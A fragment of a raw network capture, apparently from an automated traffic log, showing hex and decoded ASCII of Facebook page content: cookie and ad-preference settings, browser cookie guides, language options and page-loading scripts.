                                                                                                                                  2022-10-17 20:07:24 UTC1705INData Raw: 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6b 5c 22 3e 4f 74 68 65 72 20 77 61 79 73 20 79 6f 75 20 63 61 6e 20 63 6f 6e 74 72 6f 6c 20 79 6f 75 72 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 76 74 67 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 61 5f 5c 2f 6a 5c 22 3e 5c 75 30 30 33 43 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 64 20 5f 39 6e 67 65 5c 22 20 74 69 74 6c 65 3d 5c 22 65 78 70 61 6e 64 61 62 6c 65 20 73 65 63 74 69 6f 6e 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 63 5c 22 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 66 5c 22 3e 5c 75 30 30 33
                                                                                                                                  Data Ascii: lass=\"_9o-k\">Other ways you can control your information\u003C\/p>\u003C\/div>\u003Cdiv>\u003Cdiv class=\"_9vtg\" id=\"u_0_a_\/j\">\u003Cbutton class=\"_9ngd _9nge\" title=\"expandable section\">\u003Cdiv class=\"_9ngc\">\u003Cspan class=\"_9ngf\">\u003
                                                                                                                                  2022-10-17 20:07:24 UTC1707INData Raw: 20 73 65 74 74 69 6e 67 73 5c 75 30 30 33 43 5c 2f 61 3e 2e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 73 69 2d 5c 22 3e 41 64 20 70 72 65 66 65 72 65 6e 63 65 73 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 59 6f 75 20 63 61 6e 20 75 73 65 20 79 6f 75 72 20 61 64 20 70 72 65 66 65 72 65 6e 63 65 73 20 74 6f 20 6c 65 61 72 6e 20 77 68 79 20 79 6f 75 26 23 30 33 39 3b 72 65 20 73 65 65 69 6e 67 20 61 20 70 61 72 74 69 63 75 6c 61 72 20 61 64 20 61 6e 64 20 63 6f 6e 74 72 6f 6c 20 68 6f 77 20 77 65 20 75 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 68 61 74 20 77 65 20 63 6f 6c 6c 65 63 74 20 74 6f 20 73 68 6f 77 20 79 6f 75 20 61 64 73 2e 5c 75 30 30 33 43
                                                                                                                                  Data Ascii: settings\u003C\/a>.\u003C\/p>\u003Cp class=\"_9si-\">Ad preferences\u003C\/p>\u003Cp class=\"_9o-m\">You can use your ad preferences to learn why you&#039;re seeing a particular ad and control how we use information that we collect to show you ads.\u003C
                                                                                                                                  2022-10-17 20:07:24 UTC1708INData Raw: 65 69 6e 67 20 6f 6e 6c 69 6e 65 20 69 6e 74 65 72 65 73 74 2d 62 61 73 65 64 20 61 64 73 20 66 72 6f 6d 20 46 61 63 65 62 6f 6f 6b 20 61 6e 64 20 6f 74 68 65 72 20 70 61 72 74 69 63 69 70 61 74 69 6e 67 20 63 6f 6d 70 61 6e 69 65 73 20 74 68 72 6f 75 67 68 20 74 68 65 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 6f 70 74 6f 75 74 2e 61 62 6f 75 74 61 64 73 2e 69 6e 66 6f 5c 75 30 30 32 35 32 46 26 61 6d 70 3b 68 3d 41 54 32 5f 63 36 4e 36 77 36 50 53 41 74 6e 4f 6f 70 50 44 36 65 44 63 70 43 50 50 48 35 47 43 79 47 32 35 31 34 0d 0a
                                                                                                                                  Data Ascii: eing online interest-based ads from Facebook and other participating companies through the \u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Foptout.aboutads.info\u00252F&amp;h=AT2_c6N6w6PSAtnOopPD6eDcpCPPH5GCyG2514
                                                                                                                                  2022-10-17 20:07:24 UTC1708INData Raw: 33 33 36 62 0d 0a 6a 51 66 75 4a 35 78 63 6c 47 4a 41 37 4b 42 31 44 31 54 64 57 33 45 75 50 70 54 6d 6b 6e 66 35 49 33 4a 30 64 34 62 56 46 34 48 67 49 6a 4b 2d 5f 6a 41 37 61 67 49 77 48 58 69 59 32 52 49 75 54 52 33 73 59 73 64 5f 50 37 70 64 48 71 73 48 4b 61 76 4c 48 50 77 79 57 53 64 6c 4c 72 55 4f 73 6c 6d 37 50 35 45 76 64 5f 51 63 35 64 6e 77 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 44 69 67 69 74 61 6c 20 41 64 76 65 72 74 69 73 69 6e 67 20 41 6c 6c 69 61 6e 63 65 5c 75 30 30 33 43 5c 2f 61 3e 20 69 6e 20 74 68 65 20 55 53 2c 20 74 68 65 20 5c 75 30 30 33 43 61
                                                                                                                                  Data Ascii: 336bjQfuJ5xclGJA7KB1D1TdW3EuPpTmknf5I3J0d4bVF4HgIjK-_jA7agIwHXiY2RIuTR3sYsd_P7pdHqsHKavLHPwyWSdlLrUOslm7P5Evd_Qc5dnw\" target=\"_blank\" rel=\"noopener nofollow\" data-lynx-mode=\"asynclazy\">Digital Advertising Alliance\u003C\/a> in the US, the \u003Ca
                                                                                                                                  2022-10-17 20:07:24 UTC1710INData Raw: 2c 20 79 6f 75 20 63 61 6e 20 72 65 76 69 65 77 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 72 65 73 6f 75 72 63 65 73 3a 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 75 6c 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 71 5c 22 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 6f 70 74 6f 75 74 2e 61 62 6f 75 74 61 64 73 2e 69 6e 66 6f 5c 75 30 30 32 35 32 46 26 61 6d 70 3b 68 3d 41 54 31 39 78 67 42 71 6e 33 73 4a 64 6c 5a 51 63 59 66 63 46 62 45 6c 63 64 52 39 73 5a 6c 59 65 31 6b 69 37 50 4a 72 48 45 64 34 46 34 32 36 49 44 5f 49 42 32 66 50 71
                                                                                                                                  Data Ascii: , you can review the following resources:\u003C\/p>\u003Cul class=\"_9o-q\">\u003Cli>\u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Foptout.aboutads.info\u00252F&amp;h=AT19xgBqn3sJdlZQcYfcFbElcdR9sZlYe1ki7PJrHEd4F426ID_IB2fPq
                                                                                                                                  2022-10-17 20:07:24 UTC1711INData Raw: 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 66 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6c 5c 22 3e 43 6f 6e 74 72 6f 6c 6c 69 6e 67 20 63 6f 6f 6b 69 65 73 20 77 69 74 68 20 62 72 6f 77 73 65 72 20 73 65 74 74 69 6e 67 73 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 73 70 61 6e 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 67 20 5f 39 76 37 76 5c 22 3e 5c 75 30 30 33 43 69 20 63 6c 61 73 73 3d 5c 22 69 6d 67 20 73 70 5f 51 76 36 44 33 48 54 65 5a 55 59 20 73 78 5f 33 61 36 38 31 38 5c 22 3e 5c 75 30 30 33 43 5c 2f 69 3e 5c 75 30 30 33 43 5c 2f 73 70 61 6e 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 62 75 74 74 6f 6e 3e 5c 75 30 30 33 43
                                                                                                                                  Data Ascii: \u003Cspan class=\"_9ngf\">\u003Cdiv class=\"_9o-l\">Controlling cookies with browser settings\u003C\/div>\u003C\/span>\u003Cspan class=\"_9ngg _9v7v\">\u003Ci class=\"img sp_Qv6D3HTeZUY sx_3a6818\">\u003C\/i>\u003C\/span>\u003C\/div>\u003C\/button>\u003C
                                                                                                                                  2022-10-17 20:07:24 UTC1713INData Raw: 64 65 6c 65 74 65 2d 6d 61 6e 61 67 65 2d 63 6f 6f 6b 69 65 73 26 61 6d 70 3b 68 3d 41 54 33 57 77 66 51 6a 75 6c 43 73 38 44 45 54 6f 32 75 6a 45 76 53 73 4d 31 75 4a 4d 70 33 31 30 35 6d 38 64 50 4c 44 4e 67 58 33 55 31 44 49 44 4a 65 6f 32 54 56 65 4d 79 62 6d 47 65 33 4d 62 35 74 52 34 75 43 41 63 45 39 78 75 72 70 30 64 30 51 77 68 66 68 33 34 31 71 66 6b 6e 68 70 64 46 4c 73 53 76 6e 34 43 78 68 50 78 42 61 78 38 77 4b 42 5f 62 6c 55 34 70 52 2d 42 4d 65 4c 46 73 43 2d 67 41 30 71 73 73 47 32 56 6f 46 69 6c 76 5a 6c 76 77 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 49
                                                                                                                                  Data Ascii: delete-manage-cookies&amp;h=AT3WwfQjulCs8DETo2ujEvSsM1uJMp3105m8dPLDNgX3U1DIDJeo2TVeMybmGe3Mb5tR4uCAcE9xurp0d0Qwhfh341qfknhpdFLsSvn4CxhPxBax8wKB_blU4pR-BMeLFsC-gA0qssG2VoFilvZlvw\" target=\"_blank\" rel=\"noopener nofollow\" data-lynx-mode=\"asynclazy\">I
                                                                                                                                  2022-10-17 20:07:24 UTC1714INData Raw: 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 53 61 66 61 72 69 20 4d 6f 62 69 6c 65 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 62 6c 6f 67 73 2e 6f 70 65 72 61 2e 63 6f 6d 5c 75 30 30 32 35 32 46 6e 65 77 73 5c 75 30 30 32 35 32 46 32 30 31 35 5c 75 30 30 32 35 32 46 30 38 5c 75 30 30 32 35 32 46 68 6f 77 2d 74 6f 2d 6d 61 6e 61 67 65 2d 63 6f 6f 6b 69 65 73 2d 69 6e 2d 6f 70 65 72 61 5c 75 30 30 32 35 32 46 26 61 6d 70 3b
                                                                                                                                  Data Ascii: ow\" data-lynx-mode=\"asynclazy\">Safari Mobile\u003C\/a>\u003C\/li>\u003Cli>\u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fblogs.opera.com\u00252Fnews\u00252F2015\u00252F08\u00252Fhow-to-manage-cookies-in-opera\u00252F&amp;
                                                                                                                                  2022-10-17 20:07:24 UTC1716INData Raw: 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 34 5f 57 69 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 45 6e 67 6c 69 73 68 20 28 55 53 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 35 5f 6e 46 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 45 73 70 61 5c 75 30 30 66 31 6f 6c 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 36 5f 51 4f 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 45 73 70 61 5c 75 30 30 66 31 6f 6c 20 28 45 73 70 61 5c 75 30 30 66 31 61 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 37 5f 4d 7a 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 46 72 61 6e 5c 75 30 30 65 37 61 69 73 20 28 46 72 61 6e 63 65 29 22 7d 2c 31 5d 2c 5b 22 5f 5f
                                                                                                                                  Data Ascii: "__markup_3310c079_0_4_Wi",{"__html":"English (US)"},1],["__markup_3310c079_0_5_nF",{"__html":"Espa\u00f1ol"},1],["__markup_3310c079_0_6_QO",{"__html":"Espa\u00f1ol (Espa\u00f1a)"},1],["__markup_3310c079_0_7_Mz",{"__html":"Fran\u00e7ais (France)"},1],["__
                                                                                                                                  2022-10-17 20:07:24 UTC1717INData Raw: 5c 75 30 65 34 34 5c 75 30 65 31 37 5c 75 30 65 32 32 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 72 5f 4d 76 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 34 65 32 64 5c 75 36 35 38 37 28 5c 75 35 33 66 30 5c 75 37 30 36 33 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 73 5f 43 6e 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 34 65 32 64 5c 75 36 35 38 37 28 5c 75 37 62 38 30 5c 75 34 66 35 33 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 74 5f 43 34 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 34 65 32 64 5c 75 36 35 38 37 28 5c 75 39 39 39 39 5c 75 36 65 32 66 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37
                                                                                                                                  Data Ascii: \u0e44\u0e17\u0e22"},1],["__markup_3310c079_0_r_Mv",{"__html":"\u4e2d\u6587(\u53f0\u7063)"},1],["__markup_3310c079_0_s_Cn",{"__html":"\u4e2d\u6587(\u7b80\u4f53)"},1],["__markup_3310c079_0_t_C4",{"__html":"\u4e2d\u6587(\u9999\u6e2f)"},1],["__markup_3310c07
                                                                                                                                  2022-10-17 20:07:24 UTC1719INData Raw: 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 7d 5d 5d 2c 5b 22 55 49 54 69 6e 79 56 69 65 77 70 6f 72 74 41 63 74 69 6f 6e 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 52 65 73 65 74 53 63 72 6f 6c 6c 4f 6e 55 6e 6c 6f 61 64 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 30 5f 47 4a 22 5d 2c 5b 7b 22 5f 5f 6d
                                                                                                                                  Data Ascii: w.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing"}]],["UITinyViewportAction","init",[],[]],["ResetScrollOnUnload","init",["__elem_a588f507_0_0_GJ"],[{"__m
                                                                                                                                  2022-10-17 20:07:24 UTC1720INData Raw: 34 30 66 39 30 63 37 62 62 63 64 37 65 63 66 31 38 30 61 30 37 34 64 65 39 31 63 31 61 22 2c 22 6b 65 79 49 64 22 3a 31 39 7d 7d 5d 5d 2c 5b 22 50 6c 61 74 66 6f 72 6d 44 69 61 6c 6f 67 43 42 54 53 65 74 74 65 72 22 2c 22 73 65 74 43 42 54 49 6e 46 6f 72 6d 41 6e 64 4c 6f 67 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 38 33 35 63 36 33 33 61 5f 30 5f 30 5f 4e 77 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 38 33 35 63 36 33 33 61 5f 30 5f 30 5f 4e 77 22 7d 2c 22 63 6c 69 65 6e 74 5f 6c 6f 67 67 65 64 5f 6f 75 74 5f 69 6e 69 74 5f 69 6d 70 72 65 73 73 69 6f 6e 22 5d 5d 2c 5b 22 42 72 6f 77 73 65 72 50 72 65 66 69 6c 6c 4c 6f 67 67 69 6e 67 22 2c 22 69 6e 69 74 43 6f 6e 74 61 63 74 70 6f 69 6e 74 46 69 65 6c 64 4c 6f 67 67 69 6e 67 22 2c 5b 5d 2c 5b 7b 22
                                                                                                                                  Data Ascii: 40f90c7bbcd7ecf180a074de91c1a","keyId":19}}]],["PlatformDialogCBTSetter","setCBTInFormAndLog",["__elem_835c633a_0_0_Nw"],[{"__m":"__elem_835c633a_0_0_Nw"},"client_logged_out_init_impression"]],["BrowserPrefillLogging","initContactpointFieldLogging",[],[{"
                                                                                                                                  2022-10-17 20:07:24 UTC1721INData Raw: 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 2c 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 22 2c 22 41 6e 69 6d 61 74 69 6f 6e 22 5d 2c 22 63 73 73 22 5d 5d 2c 5b 22 54 69 6d 65 53 6c 69 63 65 49 6d 70 6c 22 5d 2c 5b 22 48 61 73 74 65 53 75 70 70 6f 72 74 44 61 74 61 22 5d 2c 5b 22 53 65 72 76 65 72 4a 53 22 5d 2c 5b 22 52 75 6e 22 5d 2c 5b 22 49 6e 69 74 69 61 6c 4a 53 4c 6f 61 64 65 72 22 5d 5d 2c 22 63 6f 6e 74 65 78 74 73 22 3a 5b 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 31 5f 4e 78 22 7d 2c 74 72 75 65 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 32 5f 55 69 22 7d 2c 74 72 75 65 5d 5d 7d 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 52 75 6e 22 5d 2c 66 75 6e
                                                                                                                                  Data Ascii: cuba_DEPRECATED","PageTransitions","Animation"],"css"]],["TimeSliceImpl"],["HasteSupportData"],["ServerJS"],["Run"],["InitialJSLoader"]],"contexts":[[{"__m":"__elem_a588f507_0_1_Nx"},true],[{"__m":"__elem_a588f507_0_2_Ui"},true]]});requireLazy(["Run"],fun
                                                                                                                                  2022-10-17 20:07:24 UTC1723INData Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 64 2f 6c 2f 30 2c 63 72 6f 73 73 2f 44 41 54 67 4a 75 4e 70 65 41 4f 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 38 2f 72 2f 5f 4c 6b 4e 5a 50 71 47 52 41 7a 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 63 72 69 70 74 22 20 63 72 6f 73
                                                                                                                                  Data Ascii: " href="https://static.xx.fbcdn.net/rsrc.php/v3/yd/l/0,cross/DATgJuNpeAO.css?_nc_x=Ij3Wp8lg5Kz" as="style" crossorigin="anonymous" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/y8/r/_LkNZPqGRAz.js?_nc_x=Ij3Wp8lg5Kz" as="script" cros
                                                                                                                                  2022-10-17 20:07:24 UTC1724INData Raw: 73 73 2f 76 63 50 71 54 69 52 77 49 69 55 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 73 2f 6c 2f 30 2c 63 72 6f 73 73 2f 70 50 4d 36 64 30 46 6c 62 32 57 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68
                                                                                                                                  Data Ascii: ss/vcPqTiRwIiU.css?_nc_x=Ij3Wp8lg5Kz" as="style" crossorigin="anonymous" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/ys/l/0,cross/pPM6d0Flb2W.css?_nc_x=Ij3Wp8lg5Kz" as="style" crossorigin="anonymous" /><link rel="preload" href="h
                                                                                                                                  2022-10-17 20:07:24 UTC1726INData Raw: 73 74 65 6e 63 79 3a 7b 72 65 76 3a 31 30 30 36 34 30 32 37 31 31 7d 7d 7d 2c 61 6c 6c 52 65 73 6f 75 72 63 65 73 3a 5b 22 5a 36 4b 4e 6e 34 51 22 2c 22 68 79 4b 6d 70 75 75 22 2c 22 4b 68 62 44 71 4c 6d 22 2c 22 45 43 33 61 59 43 6f 22 2c 22 78 4e 55 41 4f 72 46 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 66 50 54 53 43 49 32 22 2c 22 2b 52 47 74 4d 30 6f 22 2c 22 76 63 42 63 4a 6a 77 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 6a 54 58 64 48 33 65 22 2c 22 6d 52 70 44 77 6d 64 22 2c 22 45 46 31 68 57 6c 35 22 2c 22 43 6f 33 6e 65 56 64 22 2c 22 4b 41 6a 62 72 6c 2f 22 2c 22 5a 45 43 34 52 72 51 22 2c 22 63 59 55 33 63 33 32 22 2c 22 41 63 6d 5a 31 35 6d 22 2c 22 73 6a 43 51 65 7a 61 22 2c 22 59 6f 32 55 7a 4f 68 22 2c 22 4a 2b 2f 67 42 78 6b 22 2c 22 2f 72 4f 30
                                                                                                                                  Data Ascii: stency:{rev:1006402711}}},allResources:["Z6KNn4Q","hyKmpuu","KhbDqLm","EC3aYCo","xNUAOrF","n6W4xMH","fPTSCI2","+RGtM0o","vcBcJjw","vGt2mxz","jTXdH3e","mRpDwmd","EF1hWl5","Co3neVd","KAjbrl/","ZEC4RrQ","cYU3c32","AcmZ15m","sjCQeza","Yo2UzOh","J+/gBxk","/rO0
                                                                                                                                  2022-10-17 20:07:24 UTC1726INData Raw: 31 31 38 63 0d 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 30 4c 56 48 76 33 4b 58 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 6e 6f 77 5f 69 6e 6c 28 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 62 65 66 6f 72 65 50 61 67 65 6c 65 74 41 72 72 69 76 65 28 22 6c 61 73 74 5f 72 65 73 70 6f 6e 73 65 22 2c 6e 29 3b 7d 29 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 30 4c 56 48 76 33 4b 58 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 6f 6e 50 61 67 65 6c 65 74 41
                                                                                                                                  Data Ascii: 118c<script nonce="0LVHv3KX">(function(){var n=now_inl();requireLazy(["__bigPipe"],function(bigPipe){bigPipe.beforePageletArrive("last_response",n);})})();</script><script nonce="0LVHv3KX">requireLazy(["__bigPipe"],(function(bigPipe){bigPipe.onPageletA
                                                                                                                                  2022-10-17 20:07:24 UTC1728INData Raw: 57 4f 67 5f 72 6d 30 6b 34 61 79 57 76 44 2d 57 6a 51 4f 30 58 71 47 4b 4c 55 6d 76 63 42 5a 4b 42 35 73 64 36 46 57 56 44 59 62 5a 41 63 66 65 32 43 38 5a 37 6a 31 4f 73 34 58 68 68 36 44 32 6c 37 42 43 5f 62 54 63 5a 49 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 38 33 31 31 36 22 2c 5b 22 58 41 73 79 6e 63 52 65 71 75 65 73 74 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 58 41 73 79 6e 63 52 65 71 75 65 73 74 22 2c 22 41 61 32 2d 70 6e 68 59 30 6a 7a 73 6b 38 59 47 58 57 4f 67 5f 72 6d 30 6b 34 61 79 57 76 44 2d 57 6a 51 4f 30 58 71 47 4b 4c 55 6d 76 63 42 5a 4b 42 35 73 64 36 46 57 56 44 59 62 5a 41 63 66 65 32 43 38 5a 37 6a 31 4f 73 34 58 68 68 36 44 32 6c 37 42 43 5f 62 54 63 5a 49 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 38 33 31 31 37 22 2c 5b 5d 2c 7b
                                                                                                                                  Data Ascii: WOg_rm0k4ayWvD-WjQO0XqGKLUmvcBZKB5sd6FWVDYbZAcfe2C8Z7j1Os4Xhh6D2l7BC_bTcZI"]},-1],["cr:1083116",["XAsyncRequest"],{__rc:["XAsyncRequest","Aa2-pnhY0jzsk8YGXWOg_rm0k4ayWvD-WjQO0XqGKLUmvcBZKB5sd6FWVDYbZAcfe2C8Z7j1Os4Xhh6D2l7BC_bTcZI"]},-1],["cr:1083117",[],{
                                                                                                                                  2022-10-17 20:07:24 UTC1729INData Raw: 6c 73 32 49 64 53 54 79 6a 5a 53 32 56 48 55 37 37 39 58 72 54 61 2d 67 22 5d 7d 2c 2d 31 5d 2c 5b 22 42 61 6e 7a 61 69 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 4d 41 58 5f 53 49 5a 45 3a 31 30 30 30 30 2c 4d 41 58 5f 57 41 49 54 3a 31 35 30 30 30 30 2c 4d 49 4e 5f 57 41 49 54 3a 6e 75 6c 6c 2c 52 45 53 54 4f 52 45 5f 57 41 49 54 3a 31 35 30 30 30 30 2c 62 6c 61 63 6b 6c 69 73 74 3a 5b 22 74 69 6d 65 5f 73 70 65 6e 74 22 5d 2c 64 69 73 61 62 6c 65 64 3a 66 61 6c 73 65 2c 67 6b 73 3a 7b 62 6f 6f 73 74 65 64 5f 70 61 67 65 6c 69 6b 65 73 3a 74 72 75 65 2c 6d 65 72 63 75 72 79 5f 73 65 6e 64 5f 65 72 72 6f 72 5f 6c 6f 67 67 69 6e 67 3a 74 72 75 65 2c 70 6c 61 74 66 6f 